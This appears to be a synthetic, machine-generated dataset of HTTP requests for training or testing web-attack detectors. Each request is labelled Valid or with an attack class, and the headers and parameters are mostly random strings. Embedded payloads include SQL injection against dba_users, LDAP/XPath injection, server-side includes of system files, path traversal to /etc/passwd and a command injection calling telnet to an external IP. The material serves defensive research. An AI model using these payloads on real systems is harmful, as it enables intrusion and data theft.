Cookie: yo5swyo50ioymae=;Ehwh;Tseoojipno4hehB=s;pntooiQnztao1=2  or  1<  iegtr/snir4e/eulcei/child::text()[position()=07]     or   65356='] | /* | /foo[bar='
Cookie2: $Version="067"
Date: Sat, 24 Sep 05 06:13:28 CET
ETag: "OQ00ds6-4qTz@xRodc2"
Expect: thynleY=hai4ibe3;aaedry=mEses
From: fmsevou7@scdhg.org
If-Modified-Since: Sat, 25 Oct 08 22:21:04 GMT
If-Unmodified-Since: Sun, 08 Jun 08 23:55:09 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 11 May 04 21:33:41 UTC
Max-Forwards: 8367
MIME-Version: 5.7
Pragma: irp=e
Proxy-Authorization: tu7eU eQesit=tmNisum
Authorization: Digest response="ff2A3DB6cC2aFbaEB0cd7DffeEb2bDD6"
Range: -54961,-527946
Referer: /aeBsene/i3issJsh/0eoeEmj/otnIfa.ace
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 5.0; na-te; rv:4.2.4) Gecko/53398831
UA-CPU: MIPS
UA-OS: Linux
UA-Color: color16
Via: 9.6 209.105.242.150
Transfer-Encoding: gzip
Upgrade: tus/4.8, inaoh/6.3, atrg/7.2
Warning: 679 www.eaoIbje.js "depm5wyT" 
X-Forwarded-For: 109.8.17.168
X-Serial-Number: 7706137339347
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ehpishmkeebydl= oi]&psmnpoecsudgtsm=gs+6tsand&dxxFlsystemrmO=rniUVDk9jLk&g8thAen8VaAs=rt&sdeletekpoC=H88eec3rj9leas&9tzs7o3leel75=786&e7ddsdoni=hrtebt9betweenw7O&YZUV-hperl0a=t5E&tsriri=61415448&DV8I2=cGjXNxMhBK.&0ddstt=65

End - Id: 50069
Start - Id: 38644
class: LdapInjection
GET /lL_g/drr/r1xI/9VKm5UmU-oXL/s2Cm66jXtIQw0H.shtml?hv=hXouL7n&yyRIwb=aADEOXYv&xaakd1Repei=%27tiframelibN&to=O+m&eb=3769%29%28%26%28objectClass%3Dwdat%29%28%7C%28sn+%3D+ejcw%29%28cn%3Dsoo+++J*%29%29&seswtetribsiou=iodRpuyi&5nph-Kgmw1lO@0w=1qfgd6tndSail&E1rrzXeyonlctyT=%28ar&rhigiulkdlirq=Bntmeeejrsatei&g1elo=hgai_3w&irnchonb=h&a1tnhsVw=3 HTTP/1.1
Host: www.wcog.it
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=6815
Client-ip: 48.249.181.128
Cookie: Ydesd=6;hotGsmvp=39917;QHzLspasswdzhtpassa=:D;r1=oPi3o;hcsepxbytmNwsbo=k1lvb8wgoeQ
Cookie2: $Version="43"
Date: Sat, 06 Jan 07 22:06:40 UTC
ETag: "eKCAKEPvcEVEuaN0"
Expect: sedr=mo9hfett
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Wed, 31 Oct 07 09:36:21 GMT
If-Unmodified-Since: Wed, 05 Jul 06 23:29:34 UTC
If-Match: *
If-None-Match: "AMpbXIHaE4WtQjK"
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 2
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /olObxs/8e9tllec/ncsttese/dnhaa.php
TE: chunked;q=0.4,deflate;q=0.6
Trailer: Authorization
User-Agent: etP3emeod/0.2.8.7
UA-CPU: Sparc
UA-Disp: 397,637,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.3 www.Wet8imi.css, 1.0 www.uaUaEtC.css
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38644
Start - Id: 40885
class: SSI
GET /hHxN-PNUOK/hp8fJoDn2nuYWxUcwqu/touulipet6nrasirEs/a04o/hH0UiZQ.FKDpl@hLATc/oS/sAsuoleas0Ugr85iAs/YtmpexecXeosock_streamRy/Rsln9fblTdh/9aedeqtqstsrpsyslxs/-P7F_nKDudkvd.php3?3aob=%3C%21--+++%23odbc++statement++++%3D%22select++mr%2C++++has%2C+++e1mgoiv++from+++++rgds++order+++++by++++4%2C+656%2C++2%22++--%3E&tcdh=SIenwS%3C%7CEih HTTP/1.1
Host: www.ln0Ir4s.it:78
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: gzip;q=0.3, compress;q=0.9
Accept-Language: e-lEAii;q=0.9, t-eEb, 1s-itayn, on-ie
Cache-Control: max-stale
Client-ip: 18.195.218.180
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="14"
Date: Sun, 10 Jul 05 22:01:26 UTC
ETag: W/"cdUEMz1rdtb6L7v"
Expect: iu4peePa=sip9hx
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 12 Apr 06 15:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jun 07 17:47:15 UTC
Max-Forwards: 1834
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: dMod 5D9t4=toait6i
Range: 453-748
Referer: /aa3n5sl/ae6efn/er1tdt/eNst9tao.asp
TE: trailers
Trailer: Accept-Charset
User-Agent: aOnP7o http://www.4otlnyb.be
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 1.4 151.187.253.95
Transfer-Encoding: compress
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40885
Start - Id: 22675
class: Valid
GET /dRKsWdocumentCD/.o_./ansom0ieethaIDwoegj/eekseeTsrnSruOns/Ltmpzif/Wgg9f/18JyY05ELxTui/folwkeA/a1bdzlnoa0IL6fjPe.sh?unionWPRunionmrFG@eu=ninclude&rC=i%3E&a5P5Srv9=eSQdIe7x&NtftuaoittaEo=t4ePi&yjdrgrtf1dsuene=244872&W@replacevbscriptwp-Hxjs=81&ah=butoWH.HRVi&t7rpaostansa=r00%7CrciuyUehi&hteieeed5aW=%5CLe%7Eaeacq&stinantr=at41oe&eadrTatqnsxi5=n4sock_streamE&rrea=dOy5zAC HTTP/1.1
Host: www.Taenytton8.be
Connection: close
Accept: application/zip, image/jpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip
Accept-Language: a-iEN6wrli;q=0.7, j-rwHnznyi, u-z;q=0.5, rweNga-trnnssi;q=0.3
Cache-Control: no-transform
Client-ip: 130.184.171.80
Cookie: eionu6n=7roel];rinoiTwqDq=brm;fbYU1Cboot.inix6gJ6=plinknpr
Cookie2: $Version="05"
Date: Fri, 23 May 08 16:28:07 UTC
ETag: "Yxd-hA483hP8-YD"
Expect: annonel
From: ohhR@ti5t.uk
If-Modified-Since: Wed, 16 Sep 09 04:47:31 CET
If-Unmodified-Since: Tue, 05 Feb 08 04:51:03 GMT
If-Match: "qrLJtMnjT.IFkDqaHL7Z"
If-None-Match: "UDmmJBB5CdC_2.p"
If-Range: Thu, 14 Jan 10 16:31:45 UTC
Max-Forwards: 1281
MIME-Version: 0.1
Pragma: eiuoc='tetmVaai'
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Digest response="4a4c7CBf6Ad6c3ffc36ef3C4EAc6Cadd"
Range: 5-19179
Referer: http://Nhesnas.cz/dnrvuh/cHtea/6c5i.mp3
TE: trailers
Trailer: If-None-Match
User-Agent: rbbcac5/6.6
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0084x738
Via: FTP/1.0 23.27.6.150, HTTP/6.2 242.196.49.233, 9.4 242.115.172.169:3196
Transfer-Encoding: 0TEaeE; hole7yye=8aOb
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22675
Start - Id: 41348
class: SqlInjection
GET /r8bzzk2n55O4ftpct/sidjU5lsEnhfntt/lOH/2eXeJi/s7a1b/bdve8ymGhIyelemt1/huimnrton/a26kjokq/airredeTane/hna/oToIszssacriPsu/rXKF.html? HTTP/1.1
Host: www.dntaf.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ieoe-dtstnt1c, rdrrwsL-rr10ssgi, pot-h;q=0.3, erthsli-easmabu;q=0.2
Cache-Control: only-if-cached
Client-ip: 14.107.90.204
Cookie: fa=chairs'  UNION  SELECT  2     FROM  dba_users    WHERE name  like  '%25;kitrfq=903936;hphj7DHalo=i5jj;6ectnae7ch=rA_A.pBBA
Date: Thu, 18 Oct 07 22:29:05 GMT
ETag: "5o@y7GUeCd_fs.O"
Expect: 100-continue
If-Modified-Since: Sat, 14 Feb 04 12:28:59 UTC
If-Unmodified-Since: Sat, 19 Jul 08 16:30:33 GMT
If-Match: *
If-None-Match: "Sv6z2o@0BhnwBXZ4oz"
If-Range: Mon, 09 Jul 07 20:10:26 UTC
Max-Forwards: 4732
MIME-Version: 1.1
Referer: http://xta2aidw.be/kundan/ieeden0/sigds2.exe
User-Agent: Mozilla/9.2 (X11; U; Solaris 0.0; ed-ye; rv:8.1.9) Gecko/35584289
UA-Color: color8
Via: FTP/5.6 51.72.135.140, 5.9 www.wotxuna.png:27747
Transfer-Encoding: identity
Warning: 841 190.213.91.129 "1egdzdn" "Tue, 15 Mar 05 10:42:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41348
Start - Id: 15962
class: Valid
GET /5h/1U.html?fasat=07&ttole4wusaMqo7b=0oh&Aigltditnhxar=e.09q2uhUv&ehueaic4elltaCs=ete6%3Adenh&klikeMZWkzJRy=tyb1Fnc&aTswtdeV=l_ijq8FFiY._&nxswej9kfe=%28sexec%5CC3o2O+l-ueaex%25fe HTTP/1.1
Host: www.lxwgf.org:371
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: v-k;q=0.1, 0tSh-eatm;q=0.8, s-tk;q=0.0, etlbayc-aod1
Cache-Control: only-if-cached
Client-ip: 110.241.224.8
Cookie: e3elahIhio=varfprocessing-instructionsi
Cookie2: $Version="544"
Date: Thu, 29 May 08 07:41:24 GMT
ETag: "u2XFGEz0eHfKDW9VgW15"
Expect: u1thh0
From: ddlde@onchnbe.de
If-Modified-Since: Mon, 15 Mar 10 06:49:39 UTC
If-Unmodified-Since: Tue, 19 Jun 07 15:10:02 UTC
If-Match: *
If-None-Match: "M09@u8mNWNKdpj1T"
If-Range: Sun, 22 Feb 09 07:59:47 CET
Max-Forwards: 1089
MIME-Version: 1.8
Pragma: enDe0lj=ah
Proxy-Authorization: Basic b2lwdHJnaDpzc2t1dUhkbA==
Authorization: Basic ZTdobG5lOm5peWU=
Range: 28-,31802-,-7
Referer: /yptbeSoi/etzmnyn/idTeykl/egdose/dnnrhl.msf
TE: chunked,deflate;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.3 (compatible; Konqueror/8.9; Windows NT; hiovwtAhh)
UA-CPU: MIPS
UA-Disp: 9788,9519,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7490x6757
Via: noR/1.1 85.0.230.225
Transfer-Encoding: deflate
Upgrade: oMedk/7.8, rxn/7.9, niS/0.4
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 37.146.157.183
X-Serial-Number: 902795825
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15962
Start - Id: 6601
class: Valid
PUT /hWJ45h/Esey7aufbisrtxleedce/oTX6d1jFdZCWK56m2/enoDm/tanuhpM/r9hsuhew0egafih/dgxahh8eecea50/nT/aRcs@CNPKrLBtmlp/cu91PaiqBp-11R/isWaeATietbmAte.jsp? HTTP/1.0
Content-Length: 135
Content-Language: emo,lg4A,df6t
Content-Encoding: compress
Content-Location: /atoFbtT/teps/yl0becyh.sh
Content-MD5: MG9oN3JvYW1MY2V0dzlzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jul 04 02:01:14 CET
Last-Modified: Sun, 14 Jun 09 11:09:28 UTC
Host: 34.199.191.31
Connection: keep-alive
Accept: application/*;q=0.4, application/*;q=0.7
Accept-Charset: windows-874;q=0.4, koi8-r;q=0.6, x-mac-hebrew
Accept-Encoding: gzip, deflate;q=0.7, identity, deflate;q=0.7, compress;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 131.30.189.136
Cookie: vshe=884306137;dmeeecil4s=0;neA1sE3r=9
Cookie2: $Version="444"
Date: Thu, 18 Mar 04 21:00:51 UTC
ETag: "kUg4am.hFTkJ3y-9fJw"
Expect: 100-continue
From: Tiecljrv@r9uruowHsb.de
If-Modified-Since: Tue, 15 Nov 05 17:55:50 CET
If-Unmodified-Since: Wed, 27 Dec 06 14:45:58 UTC
If-Match: *
If-None-Match: "3DjTg9Rl-m.zN12kt"
If-Range: "WD3HDeBQrKa_JSZr"
Max-Forwards: 875
MIME-Version: 5.2
Pragma: eIr=drieltom
Proxy-Authorization: a6ebai Ihn0pSE=oerspa
Authorization: NTLM bmdlaXBiYm8zdGpvMFBhaW9ldGNyZXA1ZXFlc2V2Ym5vdGVkcnJlRWplNQ==
Range: 540-
Referer: http://yryaon.cz/rieLusoh/sonq2o8w/3aedsn/mhDmmotf.html
TE: trailers,deflate;q=0.8,gzip;q=0.8
Trailer: Warning
User-Agent: Mozilla/2.6 (X11; U; Open BSD i386 7.8; ls-ln; rv:1.1.1) Gecko/13504120
UA-CPU: PowerPC
UA-Disp: 3961,730,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2928x871
Via: 9.2 www.ERusea.gif
Transfer-Encoding: gzip
Upgrade: mto0a/1.6, eva/7.7, hepn/0.1
Warning: 863 22.42.57.182 "D6ga" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 43970651738336527001
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yom=e9hdsm&8iktP0Zonc_A=lre4eoo eg&snt4=an>ne-fOze&4jdu=c\rcpdoig&stEnRoebxo6nht=v scriptbtreodede&hs&sf=5or6xhw aljqcil1i&tLa=Be

End - Id: 6601
Start - Id: 25682
class: Valid
GET /tekeTedklNeYtfeo/a9/0sFhpM/9lAY/OMgrh.php?mBCM=el%3Dhn&aHbetweenBYVpsq5=e HTTP/1.0
Host: 102.81.81.124
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.0, identity, identity, compress;q=0.2, deflate
Accept-Language: OghiRxuh-eAe;q=0.0, faNnle-N;q=0.7, 4pns20d-kAtmesmQ;q=0.6
Cache-Control: min-fresh=2
Client-ip: 131.48.176.78
Cookie: rrei=018;jqXsock_streamGk=ncphnv;;stelnet-5viJaDwb=tyyhndztc;buonh=086;ihar7oaSxfe3a=ej2X9;Aehiwetlotc=vioomcAe8R
Cookie2: $Version="037"
Date: Sun, 10 Sep 06 19:45:47 CET
ETag: "Bnqa8n2t1VD7eon"
Expect: cseho8n8
From: aOfG@9hbnr28o.ch
If-Modified-Since: Thu, 16 Aug 07 15:43:54 UTC
If-Unmodified-Since: Fri, 17 Mar 06 17:24:42 GMT
If-Match: "uhNKYZ9vnynX0reT_"
If-None-Match: "Jz82@GaqHAh4SV4Ptal"
If-Range: "4jf7RbKgkk.1bvtlB"
Max-Forwards: 8813
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: ed7c eaaxe=zcoeth
Authorization: NTLM anRGZjJ1Y2Vhd2h0ZnJoY2FvbzdlYzhjb29OaGVFYWlrcHlobjROdA==
Range: 020-689,-92469,-2
Referer: /mcneO/tee2T/epetk/si7wed.mpg
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/9.0 (X11; U; Open BSD i586 6.0; 7T-mS; rv:9.4.1) Gecko/28845218
UA-CPU: PowerPC
UA-Disp: 564,067,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8973x257
Via: t9r1h/6.8 47.35.243.23:79, erfa1n/7.9 197.179.89.41
Transfer-Encoding: compress
Upgrade: src/0.7
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 188.103.199.94
X-Serial-Number: 33104741
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25682
Start - Id: 46052
class: PathTransversal
GET /im6VmM/dGX.fromPF/ebrratEyeestBetpabe/sGaninnn0b/e-NPzBQr/uB9C/nc/Ij/hH23IiEv1zb_.eItil2/cmla3fcAE4JG1xuSsK/doreN.pl?elw=tltDhnlwe&RxBL=H%3Cf&rnleTlbTtians=aexseh%2F&dietnzfon6notrn=yTosin3u0mBt&I5gdariotwhH6b=927&fE5hy0Tnph-XL=cl&dttrtdepubmAis=a8drlrogeamb%27t HTTP/1.0
Host: www.dia9e.de
Connection: nHthErA
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2, cp-932;q=0.6, x-mac-chinesetrad;q=0.4, iso-8859-7;q=0.3, x-mac-turkish;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 232.227.209.2
Cookie: 8lu2sieujs=\.\.\/\.\.\/etc\/passwd;jwnqoxo= olshUb;nZo8mAQM=6;K_mochaR3sxoTbDb=ei&
Cookie2: $Version="17"
Date: Thu, 27 Dec 07 18:52:23 GMT
ETag: "9j3TtjgYub5sVYR1k4h"
Expect: 2lhr0=hnrA;dnlnid4=ymEe
From: wrshBoou@rntia.uk
If-Modified-Since: Thu, 12 Mar 09 24:24:28 GMT
If-Unmodified-Since: Thu, 10 Aug 06 14:34:40 CET
If-Match: *
If-None-Match: "AZN0GNpAMCg5Rp."
If-Range: Thu, 01 Jun 06 16:35:41 UTC
Max-Forwards: 34
MIME-Version: 4.6
Pragma: RNmi=v
Authorization: Digest realm
Referer: /lue6rel/men4rs.html
TE: chunked,gzip
Trailer: Accept-Encoding
User-Agent: t-1M2eD http://www.aueo.org
UA-CPU: MIPS
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: FTP/3.6 205.197.43.252, swsmlc/6.6 25.22.132.230
Transfer-Encoding: identity
Upgrade: domfsc/6.5, zfo9/7.9
Warning: 762 198.204.149.124:790 "fimrmytnwtsNote" "Tue, 03 Jul 07 15:54:22 GMT"
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46052
Start - Id: 22637
class: Valid
GET /uubanHAjlleiwakkedr/iinaz8yukwihea/eR8_@/rj5qp1ojRAyXwS/abl0LUK_kmP29/d33cyI1mngs5ncomi.jsp? HTTP/1.1
Host: www.oe2ufO.fr:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.4, iso-8859-2;q=0.0, iso-8859-3
Accept-Encoding: *;q=0.6
Accept-Language: 8acact-ssLm;q=0.5
Cache-Control: hk='hhhAae2z'
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="501"
Date: Thu, 22 Mar 07 07:00:16 GMT
ETag: "jot8xJwmgVNxWAsPY-WS"
Expect: konSndn=s2th
From: dsezsSj@hnssHk.cz
If-Modified-Since: Thu, 29 Apr 10 14:36:03 UTC
If-Unmodified-Since: Fri, 23 Feb 07 08:33:31 CET
If-Match: "8cRbHYKeq6@z9pt"
If-None-Match: "CRGDAiq0w0ocGjm"
If-Range: Fri, 02 Sep 05 20:57:42 CET
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: Basic ZmwxZW5nbWY6dGVkdQ==
Range: 93-1710,671040-
Referer: /cebs1fi/lnv9na.mpeg
TE: gzip;q=0.2,deflate
Trailer: From
User-Agent: Mozilla/6.0 (Windows; U; Win98 3.1; eo-oa; rv:6.7.4) Gecko/89106814
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 3.4 www.job2.shtml, HTTP/0.1 www.ooltx.png
Transfer-Encoding: identity
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 577 www.bnimg.jpeg:110 "ifttahve" "Fri, 14 Jul 06 14:00:28 UTC"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 732034
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22637
Start - Id: 43206
class: OsCommanding
GET /fo2StB6S4n-HU/an8z4Pu4/9ET2ng-B0tY-s_3Cw/YlE83/rG/olEudg/annae/ab89s88ynco8hiaCiaec/eNOu_qOG.nsf?JiframeT0nullMBD@Q=957454&5ae=%2Byedtdthf8betweena%3B%2Bgscripthobr&etel85qqhad=07&neieaeAy=4071402&sbldei9aqtn=%25td+iptTnrlt+r%7CsLbi&Fz1@=%22+++%3B+++telnet++120.29.227.185++80+++++%3B&Llike-wL0xO0system_9=b%28anda+httpst+inizrselect&p@dVQUn=38867&ulnr6=asg&YbYfnAm.urJC=iGn8scypiracs5&mpz=a%5D%7Cn&BWxWuformuz=563978&0e=cMJiCgh&eejnao=t%3F&1rm=8719 HTTP/1.1
Host: 76.202.147.156
Connection: close
Accept: audio/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="350"
Date: Sun, 15 Mar 09 10:40:39 GMT
ETag: "XR31.2u_UhvXSfees"
Expect: nits
From: eena@eaooz.de
If-Modified-Since: Wed, 19 May 04 13:52:13 UTC
If-Unmodified-Since: Sun, 06 Jan 08 03:50:28 CET
If-Match: *
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 8552
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: /57tn1iaa.avi
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: 9ti9etialairhaghi
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: ndoou/9.3 www.iimkiue.jpeg, FTP/1.5 120.156.58.190, FTP/6.7 156.61.209.95
Transfer-Encoding: ncrazu; eia7=j9fe9
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43206
Start - Id: 2364
class: Valid
GET /6h3tilmo/Mogtmpuz/7sqeKza/iTalhmEethdsdmor/du5zaPCvH/C73passthruqxclA7mZ/eYD/nh/kUD.mdb?nu0=9&5iaoafcch=i&SsimardEu3aeN=141741&9H1uyhio=60&4rH80Fyyu=swy%27N&dwflubmia=35 HTTP/1.1
Host: www.s7Hhuday.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: SJf03a-isag, od-atm, ti-1es;q=0.0, xrd-qfeace;q=0.3, d-tus3rnna;q=0.7
Cache-Control: no-cache
Client-ip: 165.164.249.129
Cookie: naaioNn2sqaot=r5N;ds2seoDpoi=hin/;pgs=es8w httpiealibdh+eaccess_log
Cookie2: $Version="470"
Date: Sat, 21 Jan 06 07:02:29 UTC
ETag: W/"IoJUwyRwCSi1EXAsSud"
Expect: xpytrn
From: ssmE@EDar2top.be
If-Modified-Since: Wed, 24 May 06 22:13:44 UTC
If-Unmodified-Since: Fri, 26 Mar 10 09:04:25 GMT
If-Match: "Zky4ppy9D6Oqtbqhuj@"
If-None-Match: *
If-Range: Tue, 17 Jun 08 01:55:23 GMT
Max-Forwards: 93
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: scet ldosswaf=ovegTri
Range: 0813-23,-3
Referer: /rptid74u/AgETea/d5uces.gif
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 1.7; ne-ii; rv:7.5.7) Gecko/04390573
UA-CPU: StrongARM
UA-Disp: 6863,178,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3780x3384
Via: 4.8 129.193.18.170:3
Transfer-Encoding: deflate
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 978 www.d9mi.css "lg3eBieetoidotnsBnou" "Thu, 22 Oct 09 10:40:24 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2364
Start - Id: 40428
class: SSI
POST /3gzHGBhmnH/raK7FqfQqesRhC/4fnrxloaw/6k2execxBzVoWp/rigiomztydeia/tfGe1/dfponk54modekeieyw.sh? HTTP/1.0
Content-Length: 116
Content-Language: arnis,tvm,brdpei
Content-Encoding: gzip
Content-Location: /natoc/seorwnoH/hygn/e2bftrt.cfm
Content-MD5: Nm1pOHRpaWVwdG9pMmVyNg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Feb 06 16:23:31 GMT
Last-Modified: Tue, 29 Sep 09 03:21:58 GMT
Host: 167.245.135.45
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-4, cp-936
Accept-Encoding: 
Accept-Language: gipms-eloTAlee, hauemh-ueeuh, of5o-ee0ii2u;q=0.3, m-sLenap;q=0.0
Cache-Control: max-stale
Client-ip: 210.34.220.164
Cookie: sdhus=leh8slenE;yrousU=oos44;NkZ7-V4CK.=aeiscriptinreplace;wG1hIrtacT=50;ytxgtC1sxxuoM=Aa
Date: Sun, 27 Sep 09 21:48:39 GMT
ETag: W/"Eke@tojeHEhaywzh"
Expect: olamnxs
From: ssiur@ovoEteblT.it
If-Modified-Since: Fri, 25 Apr 08 17:29:26 GMT
If-Unmodified-Since: Mon, 01 Jun 09 13:24:04 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Dec 07 18:08:45 GMT
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: Basic eHNzNmNjOnY3dGlodHU=
Authorization: NTLM dnR4ZmhsYThybmRFd3JmZGhyaDZnbG54ZDl0bHduZW9zYnRlNg==
Range: 35-1,0691-
Referer: /e5iei/k0ztjtmc.asp
TE: trailers,trailers
User-Agent: sttDI (hS6brF)
UA-CPU: StrongARM
UA-Disp: 6530,0907,16
UA-Color: color16
Via: 8.3 www.rttectb.jpeg:373
Transfer-Encoding: h3eoo
Upgrade: 3h0su/4.6, Ihni1/2.0, jadi/1.1, snderm/3.9, r8h/6.6
X-Forwarded-For: 55.189.138.51
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a9FOsystemPo=<!--#include virtual="d:\windows\autoexec.bat"  -->&hsT=ae&5EyontEnS=l+setechonuu

End - Id: 40428
Start - Id: 46378
class: PathTransversal
GET /eMrT.PcEZ.dUw8yw1gP/aXicp/o8guI4ieqH/lvG@Mi562AnknrNbdeJ/3i9eoezooa/r@-YMJDv4R_ZqG.bin?a6adsym=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: 101.119.196.27:80
Connection: close
Accept: video/*
